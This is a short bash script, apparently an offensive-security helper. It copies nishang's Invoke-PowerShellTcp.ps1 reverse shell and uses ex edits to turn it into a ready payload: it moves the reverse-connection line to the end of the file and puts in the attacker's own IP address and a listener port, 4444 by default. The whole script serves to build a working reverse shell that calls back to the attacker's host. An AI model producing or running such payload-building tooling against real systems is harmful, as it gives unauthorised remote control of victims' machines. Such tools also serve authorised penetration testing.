#!/bin/bash

if [ ! -d "/usr/share/nishang/Shells" ]; then
  echo "need to install nishang first..."
  echo "sudo apt install nishang"
  exit 1
fi
ATTACKER=$(getmyip)
PORT=$1
if [ -z "$PORT" ]; then
  export PORT=4444
fi
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1
# take the line, move to end and remove "PS >"
ex -s -c 'g/Invoke.*Tcp -Rev.*192.168.254.226/m$' -c '$s/PS > //' -c wq nishang.ps1
# edit the IP
ex -s -c "\$s/192.168.254.226/$ATTACKER/" -c wq nishang.ps1
# edit the port
ex -s -c "\$s/4444/$PORT/" -c wq nishang.ps1
